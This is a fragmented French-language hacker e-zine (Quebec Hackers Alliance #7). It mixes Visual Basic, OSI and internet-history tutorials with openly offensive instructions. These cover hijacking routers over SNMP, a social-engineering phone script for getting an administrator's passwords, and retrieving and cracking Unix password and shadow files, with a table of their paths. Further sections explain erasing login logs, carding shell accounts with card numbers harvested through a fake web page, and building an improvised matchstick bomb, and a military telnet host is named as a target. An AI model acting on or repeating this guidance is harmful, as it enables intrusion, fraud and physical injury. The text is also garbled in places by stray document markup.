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E-Zine #7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http://www.qharulez.c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                       *                 dukest4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ienvenu au Zine #7 des QHA, bon, le Zine #6 c'etais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u pour rajouter de l'humour au QHA mais la on va redevenir serieux!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egalement regarder l'image inclus dans le .zip du Z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h.jpg que j'aime bien et Abrev.jpg qui sert d'accompagnemen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rticle #1: Visual Basic 4.0, par |3urton... et aussi en passant pour to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s programme ou ce donc nous parlons dans nos Zine qui ne sont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lus dans les Zine vous pouvez allez sur la page des QHA dan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tion "Files" :) Bon fake c ca j'vous present no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Quebec Hacker's Alliance Zine #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Qui sont les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QHA (Quebec Hackers Alliance) est une société, et comme dans toute société nous somme composé de gentil et de mauvais... nous avons un coté "legal" comme le web design et la radio etc etc... et d'autre coté plus illegal comme le hacking ,phreaking, anarchy etc...mais nous n'avons qu'un but: faire avancer notre organisation jusqu'au bout et pouvoir devenir un des plus gros centre de services informatique du net tout en restant benevoles... Nous somme des constructeur contrairement a certaine personne et a certain crew que l'ont nommera pas qui ne servent qu'a detruire ce que les autre construisent... Nous somme la pour faire avancé l'informatique et de pouvoir vous servir nos tal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sommes un organisme de jeunes et talentueux informaticiens Quebecois. Qui veulent donner de leur temps pour vous offrir tout ce qui peut s'offrir sur Internet comme services, ayant de de la qualité et avec un excellent support technique. Ceux qui ont ete accepté pour etre membres des QHA ne sont pas seulement des destructeurs de réseaux ni de station personnelle, comme notre drapeau semblerait le signifier. Non, nous sommes ici pour vous offrir des services gratuits tout en apprenant a maîtriser les metiers que nous avons chois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us envisageons de créer, dans la mesure du possible, autant de sous-sections qu'il existe de talents. Notre but est de regrouper les jeunes du monde et de leur offrir une chance de démontrer leurs capacité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En effet, nous sommes ici pour vous, et pour apprendre a mieux vous servir en utilisant ce que nous possédons à l'intérieur de nous-même: notre esprit et nos talents. Tout ce qu'il nous faut, c'est de l'expérience et la conviction que nous pouvons atteindre tout ce que nous voul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Veuillez prendre note que tout ce qui est inscrit dans ce qui suit n'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a but educatif. Les auteurs de ces articles retirent la responsabilite de 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e vous en faites. En bon quebecois "C pas notre probleme sti". Et avant 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ntinuer n'oubliez pas que vous n'avez aucun droit de copier ces artic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QHA Menu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1 Visual Basic 4.0, par |3urt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2 Introduction aux modèles OSI,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3 Les fonctions des couches OSI et le réseau,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4 les Routeurs et leurs hacking,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5 Le social engeneering,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6 Windows 98 et son mouchard, par B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7 Unix passwords, par B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8 Le réseau Internet, par B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9 Bombe Allumette,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10 Carding de Unix Shell Account, par [Ali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11 Telnet, par ]SoulFl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7.12 Faille de sécurité des réseaux windows 98, par Eille-la  </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7.13 Bombes qui font mal en asti,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Visual Basic 4.0 par |3urt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commencer, je vous suggère d'ouvrir le programme (Visual Basic 4.0) C'est une base que tout le monde (newbie, intermediaire et avancés) doivent maitriser! La je vais commencer RAIDE un peu (surtout pour les newbies) car je vais passer aux Variables (terrifiant comme nom non??) mes articles seront divisé en modules.. comme je n'ai pas terminé le module 2 (module 1 n'étant pas nécessaire) je vais passer dès maintenant au module 3. Mais pour le moment je vais vous  montrer les abréviations française utilisé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r le fichier Abrev.jpg ci-jo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ule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ère part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Varia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 'utilisation des variables est un des éléments les plus puissant à la disposition du concepteur de logici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éfin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riable : Une variable est un élément qui représente un espace mémoire utilisé pour stocker de l'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ification des varia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trouve deux grandes catégories de variables : les variables dépendantes et les variables indépendan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mieux comprendre, examinons l'exemple suiv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MBRE1 =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MBRE 2 =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TAL = NOMBRE1 + NOMBRE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Çe petit programme utilise 3 variables : NOMBRE1, NOMBRE2 et TOTAL. Parmie celles-ci, NOMBRE1 et NOMBRE2 sont considérées comme étant des variables indépendantes car rien dans le programme ne viens modifier leur valeur. Au contraire, la valeur de la variable TOTAL dépend directement des deux autres variables (NOMBRE1 et NOMBRE2) ainsi que l'opérateur mathématique qui les unit (dans ce cas-ci, l'addition). On dit alors qu'elle est une variable dépendan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cet exemple, les variables sont de type numérique, car elles servent à manipuler des nombres. C'est en utilisant les variables numériques qu'il est possible de programmer les diverses fonctions mathématiques.  Il existe plusieurs types de variables numériques : INTEGER, LONG, SINGLE, DOUBLE, CURRENCY.  Cependant on se limitera à certains typ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retrouve également des variables alphanumériques qui servent à contenir des chaînes de caractères. On identifie une variable alphanumérique en ajoutant le signe $ à la fin de son nom. Par exemple, le nom de variable TOTO$ nous indique qu''lle est alphanumérique. Voici un exemple pour expliquer ce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1$ = " Sal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2$ = " Les am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RASE$ = MOT1$ + MOT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programme prend le contenu de deux variables alphanumériques et les place bout à bout. Il est très important que tu remarques que le contenu des variables alphanumériques doit TOUJOURS être placé entre guillements. L'utilisation du symbole + entre des variables alphanumériques réalise une opération qui se nomme la concaténation (placer bout à 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contenu de la variable PHRASE$ serait donc : Salut Les am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noms de varia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ual Basic est donc un langage puissant qui permet l'utilisation facile des variables.  Il faut cependant respecter quelques règles simples lors du choix de nos noms de varia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n nom de variable ne peut compter plus de 40 caractè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n nom de variable doit commencer par une let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n nom de variable ne doit pas être identique à un mot réservé par Visual bas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n nom de variable ne doit pas contenir d'e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e nom de variable doit être significatif, c'est-à-dire bien définir ce que la variable doit conten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portée des variables (Globales ou Loca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variables Visual Basic possède une portée (GLOBALE ou LOCALE). C'est la portée qui détermine à quel endroit le programme poura utiliser la vari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RIABLE GLOBALE : Elle est accessible à partir de n'importe quel endroit dans le programme. La portée de ce genre de variable est définie dans la partie générale du module de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RIABLE LOCALE : Variable qui n,est connue que dans la procédure oû elle est déclar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déclaration des varia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une procédure, tu déclares une variable à l'aide de l'instruction Dim. L'instruction Dim déclare des variables et leur alloue de l'espace mémoire. La syntaxe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im nom-de-variable (As Ty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emple : Dim var_test As Inte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les différents types de variables possibles : Integer, Long, Single, Double, Currency, String, Vari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Visual Basic, tu n'as pas à déclarer une variable avant de l'utiliser. Si tu utilise dans ton code un nom qui ne correspond à aucune variable existante, Visual Basic crée une nouvelle variable portant ce nom. Toutefois, il est préféré de déclarer les variables puisque les déclarations explicites favorisent la clarté dans le code et c'est ce que nous voul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ual Basic respecte les priorités mathémati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Expos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Multi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i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d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Soust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opérateurs de re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érateurs de re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Ég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Supéri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   Inférieur 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Supérieux ou égal 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 Inférieur ou égal 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gt; Différ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 opérateurs seront d'une très grande utilité lorsque tu utiliseras des boucles et des conditions dans tes program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aux modèles OSI, par Clad Str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on sang: faut que je r'devienne sérieux là... Nan parcequ'en fait ça va devenir corsé!!! Qu'est-ce qu'un modèle OSI... C'est un plan de base misau point par l'I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ernational Standard Organization), qui définit comment seront envoyés les packets d'informations... Ce modèle est composé de 7 couches: la cou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pplication, de présentation, de session, de transport, la couche réseau, la couche liaison et la couche physique! J'vais pas décrire à quoi sert chaque couche si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n as pour des heures à l'finir ce txt. Alors on va juste s'intéresser aux 3 couches les plus basses (la 1, la 2 et la 3), donc la couche reseau, la couche liaison,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ysique. Chacune de ces trois couches est en communication avec les autres couches de même nom d'un autre modèle O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couche réseau: c'est ce qui permet de fournir les moyens d'établir, de maintenir et de libérer des connexions de réseau. Elle permet l'acheminement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ckets d'informations via le réseau. L'adressage du réseau est fait par les routeurs. Donc les infos passent par les routeurs eux-mêmes... En deven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dministrateur d'un routeur on peut en juger que: on peut recevoir les informations, détourner l'adressage du réseau, etc... En devenant l'administrateur d'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uteur on devient "l'BigBoss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œ La couche Liaison et la couche Physique nous intéresse moins vu que c'est pas là qu'on y trouvera les routeurs ^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à comment se présente le modèle OSI en liaison avec un autre modèle O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7 APPLICATION       |               |   APLICATI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6 PRESENTATION    |               |   PRESENTATI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SESSION   5              |                |   SESSI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TRANSPORT 4       |                 |   TRANSPOR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RESEAU    3              |------------|   RESEAU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LIAISON   2              |------------|   LIAIS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PHYSIQUE  1            |------------|   PHYSIQU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un packet d'information va passer par chaque couche avant d'être envoyé via les couches de communications... Ces informations seront encapsulé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fermées), dans une "enveloppe"... Le protocole (le protocole X25 en fait) va définir la façon dont l'adresse va être écrite sur l"enveloppe"... En fait un protoco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définit les règles d'adressage du packet de donné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s fonctions des couches OSI et le réseau, par Clad Str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je voulais passer les fonctions des couches mais mon pote me gueule dessus pour que j'te raconte leurs fon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va même définir celle RESEAU, même que ça a été fait ci-haut. Mais abrégeons ^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Application: elle gère le transfert d'informations entre program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Présentation: elle s'occupe de la mise en forme des textes et des conventions       d'affich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Session: elle s'occupe de l'établissement, de la gestion, de la coordination des      commun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Transport: elle gère la remise correcte des inform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Réseau: elle détermine les routes de transport et s'occupe du traitement et du transfert       de mess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Liaison de données: elle s'occupe de du codage, de l'adressage, et de la transmission       des informa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La couche Physique: elle gère les connections matériell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s Routeurs et leurs hacking, par Clad Strife</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EEEEE! enfin du pur de dur! Le routeur... Comme expliqué ci-haut il permet d'indiquer par ou va passer le réseau... (Cependant certaines entreprises off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utres services que vous pourrez consulter sur le net...) du moins c'est cette info qui nous intéresse car en devenant l'administrateur d'un routeur il est évident qu'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ut changer l'adressage du réseau, et ainsi de récupérer les informations de la plus haute importance * fantasmez pas là! :) *, mais en devenant l'administrateur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éseau on est quasiment le MASTER DU SYST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H!!! TU KIFFES CA HEIN? Hehem... bon le tout pour trouver l'adresse d'un routeur est d'abord de trouver le réseau nan? très simple... z'avez l'ur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ww.perdu.com, merde comment avoir la liste des routeurs de perdu.com? Vous tracez sous dos www.perdu.com de manière à avoir l'adresse IP du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181.252.100. Sur cette IP seul 207.181.252 nous intéresse: c ça qui définit l'adresse du réseau... Ainsi on va scanner tout ce qui est sur ce réseau.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mbreux programmes font ça (le meilleur: WS PING PRO PACK sur http://www.ipswitch.com), et on en scannant uniquement ce qui est SNMP on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095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161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191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192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193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7.181.252.223 SNM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trop puissant ça? Bien sur j'vous déconseille encore une fois de déconner avec ça... enfin:  vous voilà prévenu. Maint'nant si vous vous en pétez les couilles :)) E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i car chaque connexion OU tentative de connexion est enregistrée avec votre IP... Rien n'est simple... C'est pour ça qu'il existe le spoofing!!! Kézako???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lez l'savoir??? Bof, c simple, mais j'vais vous expliquer ça à la fin de ce chapitre. Now je vais vous expliqu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comment te connecter à un rou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sous quel environn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que faire sur le rou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On s'connait bien maintenant: j'vais vous tutoy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nt se connecter à un routeur: c simple. Une fois que t'as trouvé l'adresse d'un routeur: tu te connectes à lui via telnet sur le port SNMP. Ensuite tu vas de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liser TES méthodes (chacun ses méthodes) pour trouver les passwords et les pass. Moi pour les logins je fais un lookup de l'adresse IP, pour les pass utilisez l'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 sniffing. Sous quel environnement??? (j'lavais oublié cette question là!) telnet bien s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faire sur le routeur, bah ce que t'as envie... en fait j'pensais inclure ici une partie du texte de NeurAlien, mais il préfère qu'on l'oublie alors j'mets rien du tout (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mieux est de taper help pour avoir la liste d'op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 social engeneering, par Clad Str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ais, on a déjà vu ce mot plein de fois mais on sait ni ce que c'est ni comment faire hein? Ben j'suis là pour ça! Le social engeneering consiste en gros à se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ser pour quelqu'un dans le but d'obtenir de bonnes informations. Un exemple: Vous faites un lookup du site de la société Daoum, alors vous vous dites: ch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vais essayer de m'amuser avec cette société rentrer sur leurs ordis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vous allez prendre le tel de l'administrateur (appelons le Mr Bilbao) de tout ce petit monde et vous allez vous faire passer pour un autre administrateur,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elqu'un d'autre que Mr Bilbao pourrait connaitre. Voilà à quoi devrait ressembler la conversation au télép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 Allô, Mr Bilba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Bilbao - O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Voilà Mr Teteau (l'autre administrateur) m'a chargé de vérifier la sécurité du routeur dont l'IP est: 154.154.154.154, et il a cependant omis de me remettre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swords... Auriez vous l'obligence de me les donner pour que je puisse me mettre au trav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Vous ne pouvez pas les demander à monsieur Teteau lui-mê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J'ai essayé mais il est absent voilà bientôt plus d'un jour. Hors j'ai un délai imparti, comme écrit dans mon contrat, comprenez don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d'accord not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c'est dans la poche, sinon sachez que ça peut se gâter, on pourra vous répond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On ne m'en a jamais parl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Mr Teteau qui est à coté de moi nie ces fa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rappelez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Ecoutez je sais très bien que ce ne sont que des menson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Je vous passe monsieur Tet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 c'est les réponses qui vont vous niqu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haque chose son astuce: une fois vous serez le stagiaire ou vous travaillerez au SCSSI, faites marcher votre imagination... La réussite de votre projet ne tient qu'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dernière indication, si vous ne voulez pas vous faire repérer par le boitier France Telecom qui indique votre N° de tel tapez le 3651 avant de taper le tel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rs, ayez une voix d'adulte et... Soyez convainc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Windows98, et son mouchard, par B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 Si vous possédez Windows98, Microsoft a integré un mouchard lors de l'installation de l'OS! Pour le moment Microsoft a juste mis ce mouchard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veiller leurs produits. Mais ce n'est pas tout, une personne qui connaît bien comment fonctionne ce mouchard peut sans autre voir vos données confidentielle v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ernet!!! Microsoft vous a assigné 2 numéros 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e premier est appelé Hardware ID et sert à reconnaître votre PC. Donc lors de votre connexion à Internet, Microsoft peut sans autre vérifier les actions que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z fâites sr votre ordinateur :( Ce numéro permet aussi de vérifier l'adresse de votre carte Ethernet si vous en avez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e deuxième est appelé Microsoft ID et il se met dans un cookies de www.microsoft.com pour tracer vos mouvement autour de leur site. Il sert aussi à vérif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unique numéro qui est sur la pochette CD de Windows98, alors gaffe aux cop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ppression du mouchard: Bon, ce mouchard est très vite désactivé. Pour celà aller dans le "Menu démmarer" puis "Exécuter" et la tap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egsvr32.exe -u c:\Windows\system\regwizc.dll pour désactiver le mouch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egsvr32.exe -c c:\Windows\system\regwizc.dll pour activer le mouch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Unix passwords, par B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mment se procurer le fichier password sous Un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rmalement pour accéder à ce fichier il faut taper "/etc/passwd" à la fin de l'URL, sans compter les index.html,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ce que ca donne: lamer:*:23423:200:User MMP:/usr/perso/lamer:/usr/bin/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fichier est constitué de plusieurs par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amer: Login ou nom d'utilis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C le pass encrypté, desfois y a un * et desfois y a des chiffres et des lettres (je vous parlerais du * en b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23423: Numéro du log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200: Numéro du grou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er MMP: Info sur le créateur du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r/perso/lamer: Répértoir du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r/bin/true: le sh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mment cracker un pass Un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pass Unix ne peuvent pas être décrypter, c à dire que les pass sont encrypté, et lorsque l'utisateur entre un password, celui-ci sera directement encrypté puis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passwords sont comparés! (Putain y a beaucoup de "pass" dans cette phrase :)! Ok c super de savoir ca, mais moi je veux savoir comment on trouve le p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tu calmes, tous ce qu'il faut c un crack pass avec un dico (cracker Jack est dispo sur ce site) et ensuite cracker jack va encrypté les mots après les autres jusqu'à</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 que les deux pass sont identiques! Fastoche, he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Que'est ce que le Password Shad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password shadowing est un système de sécurité où le pass encrypté de /etc/passwd est tout simplement remplacé par un signe (*) et que le vrai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crypté se trouve dans un autre répértoire que normalement ne peut pas être vu par d'autres utilisateurs :( MAIS, eh oui, y a un mais! Donc, mais pour contre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dowing, on va faire appel à un programme (Deshadow est dispo sur ce site) qui va retrouver le vrai pass encryp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mment trouver le password si il est shadow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h bien, suivant le signe qui est à la place du pass encrypté, il va falloir chercher le bon répérto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x                  Répértoire                     S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IX 3                 /etc/security/passw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tcb/auth/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X 3.0s             /tcb/files/a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SD4.3-Reno           /etc/master.passw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vexOS 10           /etc/shadp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vexOS 11           /etc/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G/UX                 /etc/tcb/aa/u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P/IX                 /etc/shadow                     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P-UX                 /.secure/etc/passw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RIX 5                /etc/shadow                     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ux 1.1             /etc/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SF/1                 /etc/passwd[.dir|.pa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O Unix #.2.x        /tcb/auth/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nOS4.1+c2           /etc/security/passwd.adjunct    ##user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nOS 5.0             /etc/sha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stem V Release 4.0  /etc/shadow                     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stem V Release 4.2  /etc/security/                  * datab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ltrix 4              /etc/auth[.dir|.pa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COS                /etc/ud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là, pis quand vous avez enfin trouvé la bonne URL, ben vous enregistrez la page est vous éxécuter Desha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mment effacer le logs de ma connection au serv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faut editer /etc/utmp , /usr/adm/wtmp et /usr/adm/lastlog, mais il faut un programme spécial pour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e réseau Internet, par Bo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Sa semble banal comme article mais serieux shuis sur que meme les plus grand hacker peuvent en apprendre dans ce text! Lisez le quand me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roducti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 ce que l'Internet : Internet est un réseau mondial constitué d'une collection d'ordinateurs interconnectés. Actuellement il a pour principales applications le courrier électronique d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 (système d'acheminement de message par l'Internet), le transfert de fichiers (idem que le E-mail, mais avec des programmes ou fichiers), les forum de discussions (discu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écrites sur Internet), la connexion a des services tels que la banque, les achats et des net meeting (discussions avec des micros et des caméras). On dit qu'Internet est une véritable sour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nform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tor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histoire de l'Internet est relativement jeune, mais son développement s'est fait de façon explosive. Il a son origine d'une expérience menée par le Département de la Défense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États-Unis. Les militaires voulaient mettre sur pied un réseau d'ordinateurs qui continueraient de fonctionner dans l'éventualité d'une catastrophe, telle une guerre nucléaire. Si une part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 réseau venait à être endommagé ou détruit, le reste du système ne devait pas en être affecté. Ce réseau, appelé ARPANET, reliait des chercheurs et scientifiques américains. C'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cêtre de l'Internet que nous connaissons aujourd'h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1985, la National Science Fondation (NSF) a créé le NSFNET, un réseau de communication qui relie des centres de recherche et d'éducation. Basé sur l'expérience d'ARPANET,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SFNET a bâti l'épine dorsale du réseau de l'Internet pour les États-Unis, un service gratuit pour les institutions scolaires et les chercheurs américains. Durant la même période,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éseaux régionaux voyaient le jour pour relier la circulation électronique d'entreprises privées avec le réseau natio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aucoup de gens ont découvert l'immense potentiel du système, de grandes entreprises ont commencé à construire leur propre réseau en les reliant à celui de NSFNET. Le problème f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chaque réseau d'entreprise utilisait son propre protocole ( contrat grâce auquel 2 ordinateurs peuvent communiquer entre eux ), et ce n'est qu'en 1990, en Suisse, que le CER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éveloppé le World Wide Web (WWW). Il est maintenant développé par Le Consortium du World Wide Web, aussi connu sous le nom World Wide Web Initiative. Le WWWI a é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ndé par plusieurs entreprise telle que AT&amp;T, Adobe Systems Incorporated, Microsoft Corporation et Sun Microsystems In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s qu'est ce que le World Wide Web exacteme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peut imaginer cela comme un système de documents reliés les uns aux autres à travers le monde ou comme une gigantesque toile d'araignée. Mais à la place d'afficher seulement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xte, le Web nous permet aussi de diffuser des informations sous forme graphiques, photos en couleurs, sons, vidéos, etc.… Tous ces fichiers sont stockés dans des serveurs. Do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on arrive sur un site, il faut envoyer une demande au serveur pour qu'il nous affiche la page. Comme le site d'un serveur contient des liens vers d'autres serveurs dans le mo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simple clique peut nous envoyer vers Washington par exemple, et cette sorte de colle qui retient tous ces éléments s'appelle Liens hypertexte. Ces éléments permettent un accès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le aux fichiers du Web. C'est pour cela qu'on donne l'expression naviguer sur le Net, mais pour naviguer il faut un navigateur tel que Netscape ou Internet Explorer qui transforment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age de programmation du Web ( l'HTML) pour que nous le compre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économ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c l'Internet, beaucoup d'entreprises ont commencé à instaurer la vente de leurs produits sur le réseau. Désormais, de plus en plus d'entreprises utilisent ce système de commerc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rte que ce marché est en constante progression. Actuellement, les produits les mieux adaptés au commerce électronique sont ceux qui peuvent faire l'objet d'une vente p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rrespond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stime que seulement environ 7% des utilisateurs d'Internet n'utilisent pas l'achat online (connecté sur le réseau), par contre la moitié achète en moyenne 5 produits par année. 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iste pas de statistiques fiables quant au nombre d'utilisateurs et au volume du commerce électronique. Néanmoins, les estimations parlent d'environ 100 millions d'internautes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mentation de 15% par mois. Le volume annuel mondial du commerce électronique dépasserait actuellement les 50 milliards de dollars et atteindrait 200 milliards en l'an 2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est intéressant de noter que les achats s'effectuent malgré les problèmes de sécur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banque en ligne (connexion en direct avec sa banque via Internet) est très pratique. Elle permet d'accéder à son compte bancaire via un modem et un PC, de faire des virements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fois de réaliser des opérations boursiè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développement explosif de l'Internet permet de penser que le commerce de produits et de services va augmenter énormément et débouchera demain sur des transactions dont on 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core aucune idée aujourd'h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 problèmes de sécur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sécurité est vraiment LE problème pour tous les internautes et les entreprises. Les sondages révèlent que 95% des utilisateurs d'ordinateurs sont concernés par la sécurité de l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nnées, que l'ordinateur soit utilisé à des fins personnelles ou professionnelles. Parmi eux, 86% ont le sentiment de ne pas être suffisamment informé sur les risques encour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sécurité est un sujet aux multiples aspects. Pour être absolument certain qu'aucune personne non-autorisée n'accède à ses données, l'utilisateur d'un ordinateur doit respecter toute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érie de règles, prendre des mesures de préventions et combler les failles du système de sécurit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ckers et pirates: A l'origine, le mot "hack" désigne une astuce de programmation rendant l'ordinateur capable de choses qu'il n'aurait jamais dû faire. Les personnes maîtrisant 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chniques s'appellent des hackers. Pour beaucoup de gens, ce mot est très flou, alors que les médias en donne souvent une idée de menace aux lecteurs. Donc, une définition simple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acte serait: ce sont des personnes qui arrivent subtilement à s'introduire de leur plein gré dans le système d'un réseau informat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transactions bancaires: Pour les hackers, c'est une cible assez facile, car pour aller sur son compte bancaire, l'utilisateur doit entrer son PIN (mot de passe); il suffit donc qu'un hac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troduise sur le PC de l'utilisateur et y installe un fichier LOG (c'est un petit programme qui va enregistrer toutes les commandes faites par la victime) et revient le rechercher une sem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rès. Et, une fois qu'il a trouvé son PIN, il va virer de l'argent sur son comp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virus: Il y a environ 5 nouveaux virus qui apparaissent chaque jour. Pour un utilisateur, un anti virus est vraiment indispensable s'il veut protéger ses données. On peut caractér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 virus par catégor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virus d'applications (ces virus s'attaquent à la mémoire de l'ordinateur), les virus de clusters ( ils se cachent dans des secteurs non utilisés par le disque dur et fonctionnent comme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rus d'applications), les virus polymorphes (ils échappent aux anti virus et se reproduisent au démarrage de l'ordinateur), les rétrovirus (ces virus vont d'abord attaquer les anti virus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suite se répandent partout), les virus stealth (ils attaquent la mémoire en y ajoutant des unités, ce qui baisse la mémoire de l'ordinateur), les macro virus (ces virus s'attaquent a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cuments tex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virus liés au réseau s'appellent les chevaux de Troie (dont l'origine remonte à la mythologie grecque) et sont des virus qui n'ont aucun but destructeur comme ses confrères. Ces vir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nt justes là pour espionner les données informatiques de l'utilisateur et de renvoyer toutes ces informations à son créateur. De plus, ce sont vraiment des virus malins, car ils se cach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rrière d'autres données pour envoyer leurs données, ils sont donc très durs à reconnaî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chat online: C'est un des problèmes de sécurité que craint la plupart des utilisateurs d'Internet, car pour recevoir leurs marchandises, ils doivent mentionner leur numéro de cart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édit, pour que le vendeur puisse ensuite virer le montant sur son compte. Lorsque la validation est finie, toutes les données sont cryptées (c'est-à-dire qu'elles sont transformées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ngage inconnu) et ensuite décryptées par le vendeur, mais si par malheur un hacker arrivait à intercepter les données pendant son trajet, il pourrait alors avoir le numéro de cart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édit et de plus il pourrait aussi changer les données contenues. Voici un autre problème qui arrive assez fréquemment. Il s'agit ici d'arnaques. En effet, il suffit au vendeur de créer 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rveur sur le web et faire son site pour des achats. Une fois qu'une personne lui achète quelque chose et que le vendeur reçoit son numéro de carte de crédit, il disparaît dans la na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ec le numéro de carte de crédit et fait ses propres acha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piratage: Les attaques classiques de ce domaine sont les changements de la page d'accueil d'une entreprise ou d'une organisation avec le but d'attirer l'attention des médias.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un pirate réussisse, il lui faut le password de l'utilisateur FTP (c'est le protocole des transferts de fichiers) et comme le nom d'utilisateur s'obtient facilement, le hacker va utilise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ière du brut force (envoyer un mot après l'autre jusqu'à ce que le bon mot soit trouvé) pour trouver le mot de passe. Une fois le mot de passe et le nom d'utilisateur trouvé, il ouvre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ssion FTP et change la page d'accueil du site. Ces derniers temps, des hackers ont même réussi à s'introduire dans le système informatique du FBI, de la CIA, de la NASA, etc.. Pour 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ndre des informations très secrètes. Certaines entreprises engagent même des hackers pour aller espionner des entreprises rivales et ensuite les faire cou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lu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jourd'hui, les solutions les plus répandues pour sécuriser les transactions s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GP (Pretty Good Priva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GP est un programme de cryptage/décryptage qui a été créé par Phil Zimmerman qui a eu pas mal d'ennuis car son programme est tellement sûr que les gouvernements ne veulent pas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GP soit utilisé par n'importe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SL (Secure Socket Lay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SL est un protocole de communication d'information qui permet d'assurer l'authentification, la confidentialité et l'intégrité des données échangées. Ce protocole utilise un moyen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yptographie. De plus, il est compatible avec des logiciels de communications usuels (FTP, Telnet, http,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SH (Secure S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SH est une version sécurisée des programmes usuels (FTP, Telnet, http, etc..) mais malheureusement ne fonctionne que sur UNIX (système d'explo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y aura de toute manière des bugs (ce sont des défauts de programmation dans un programme) dans les programmes de sécurité ou les systèmes d'exploitation. On croit toujours que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veaux logiciels sortis, sont infaillibles aux hackers, mais deux mois après on entend déjà parler de bugs dans le programme, c'est exactement ce qu'a fait Intel pour son pentium3. Il y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e puce qui enregistre toutes les actions faites par l'utilisateur pour une raison de sécurité, mais 3 jours après sa sortie, des hackers ont avoué aux médias qu'ils avaient déjà trouvé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yen pour trafiquer la puce et donc de la rendre inutile. A mon avis, le meilleur moyen de ne pas rencontrer de problèmes, c'est de vérifier toutes les connexions au réseau, d'améliore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yptage, de souvent changer de mot de passe et que les programmeurs de logiciels ne fabriquent pas leurs produits seulement pour l'argent, mais qu'ils y travaillent vraiment dessus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érifient encore et encore leurs programmes au lieu de ne le tester qu'une fois et ensuite de le commercialiser. Mais il y aura toujours et toujours des petits malins qui arriveront à déjou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 systèmes de sécurité. Donc, comme dit le dicton, mieux vaut prévenir que guér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études effectuées montrent que l'augmentation énorme du nombre d'internautes apportera une augmentation du trafic et du commerce sur Internet de plusieurs centaines de pour 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 an. Je pense que les recherches vont permettre de résoudre les problèmes de confidentialité et d'authentification des correspondants et ce, malgré les craintes des gouvernem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envers tous les procédés de cryptage qui leur interdirait de prendre connaissance, d'une façon ou d'une autre, de certaines donné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Bombe Allumette, par Dukest4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Ingrédient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Du tap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Une balle de tenni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lang w:val="en-CA"/>
        </w:rPr>
        <w:t>- Des bouts d'allumet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lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Un couteau</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Ok commence par prendre plein de petit boute d'allumettes pour</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les mettre dans la balle des tennis pour la remplir au complet...</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pour ca faut tu fasse un trou dans ball de tennis... Doh!) pi apre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ca tu referme la balle a'c le tape... sa d'lair bin stupide mais criss qu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sa pete fort! Mon voisin a failli mourrir (moi encore plus quand y</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m'courrait apres hahahaha) Tk Bonne chance pi rate pas ta shot sa</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coute cher d'allumette en asti!!! heheh</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lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Dukest4r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>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arding de Unix Shell Account, par [Aliens]</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nt carder un shell account ! Évidament , Tout le monde aimerais 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oir des eggdrops sous une bonne box ( preferable Linux Redhat s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1 ou T3 ( partager ou pas en sen cri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que je vous conseille de proceder comme qui sui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faire un search sur le net de " Unix Shell Accou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i je prend comme search www.go2net.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u cherche une Compagnie qui demande pas le ISP email et qui pr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 Credit C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Tu doit avoir un numero de CC valide ( conseil de InRaGe : tu h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e page web de XxX pi tu envoies le formulaire de #CC a une adre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tmail par exemple comme sa ta des CC de criss de pervert pi tu p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utilisers car la plupart du temp son meilleur que ceux dun CCGener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art le nouveau des QHA qui facilitent un p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Jespere que tu sais comment paster qqchose dans le formul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Tattend pi tespere que sa va marc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 En temp normal tu peu pas Carder un shell parce quil c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s tu peu toujours tessay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 rien de mieu a Faire si tu veu pas paye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LIE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Telnet, par ]SoulFl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Tel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elnet est une fenêtre ouverte sur les ressources d'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dinateur  étranger, c'est un moyen d'entrer en commun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vec des bases de données, services d'information,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c l'aide d'un logiciel Telnet(un est fournis avec windows)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tilisateur peut, par exemple, se branché de son post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vail sur un ordinateur étranger pour exploiter les program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i s'y trouve, si, évidament, il en a la permission (ou a réu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à y accéder sans la per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elnet est un utilitaire de connexion standard que l'on trouve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u pres partout, quel que soit le systeme d'explo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ur le faire fonctionner c'est tout simple, Il suffit de l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nner comme argument l'adresse, ainsi que le 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emple :] telnet www.club-internet.fr 25 vous permet de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necter sur le service de mail de club-int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sous linux ou sous dos, la commande est la m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net &lt;adresse/IP&gt; &lt;port&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pendant, la connexion a beau etre simple, la plupart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éponses que vous obtiendrez seront pour vous avertir que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nexion est impossible. Je pense maintenant que vous savez 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 un telnet, donc passons à la partie suivan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a partie interressante pour nous.   allé dans connect, puis remot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ici un exemple de connection par tel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st name: ariane.ulaval.ca  (vous connec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n faite le et puis apres je vous laisse taponner un p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en francais) et au pire taper help, y aura les comman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ce que vous pouvez faire avec) moi jai appris ca tout se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un hacker se doit d'etre autodidacte! bon ok Kris chus un peu paresseux ;) m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st-ce que chuis payer moi??? Nah... alors vous avez rien a dire Syboir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whehe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and vous aurai compris le principice voici une adresse telnet   à hac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dresse de l'U.S Navy par telnet: navobs1.usnogps.navy.m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 passant tout ce que vous faites depuis votre connection à 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vy est  logger (enregistré si vous préféré) donc avant de le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ofer votre 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Les différents ports utilisables sous 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rs d'une connexion telnet, on choisi le numéro de port sel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service que l'on veut utiliser. Encore faut-il connaitre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fférents services disponibles. En voici une part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rt:</w:t>
        <w:tab/>
        <w:t>Nom:</w:t>
        <w:tab/>
        <w:t>Descriptio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tab/>
        <w:t>Echo</w:t>
        <w:tab/>
        <w:t>Repete tout ce quu'on lui dit (Utile pour les</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>te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w:t>
        <w:tab/>
        <w:t xml:space="preserve">FTP </w:t>
        <w:tab/>
        <w:t>(file transfer protocol) Utilisé pour transférer</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>des fichi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w:t>
        <w:tab/>
        <w:t>Telnet</w:t>
        <w:tab/>
        <w:t>Permet une connexion avec ligne de comman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w:t>
        <w:tab/>
        <w:t>SMTP</w:t>
        <w:tab/>
        <w:t xml:space="preserve">( Send Mail TRansfer Protocol ) C'est ici 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es courrier arrivent sur le serv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w:t>
        <w:tab/>
        <w:t>Finger</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Donne des informations diverses sur les </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>utilisat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w:t>
        <w:tab/>
        <w:t>HTTP</w:t>
        <w:tab/>
        <w:t xml:space="preserve">( Hyper Text Transfer Protocol )Le protoc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tilisé pour les pages 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0</w:t>
        <w:tab/>
        <w:t>POP3</w:t>
        <w:tab/>
        <w:t>C'est ici que l'on récupere la plupart des</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>courri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39</w:t>
        <w:tab/>
        <w:t>????</w:t>
        <w:tab/>
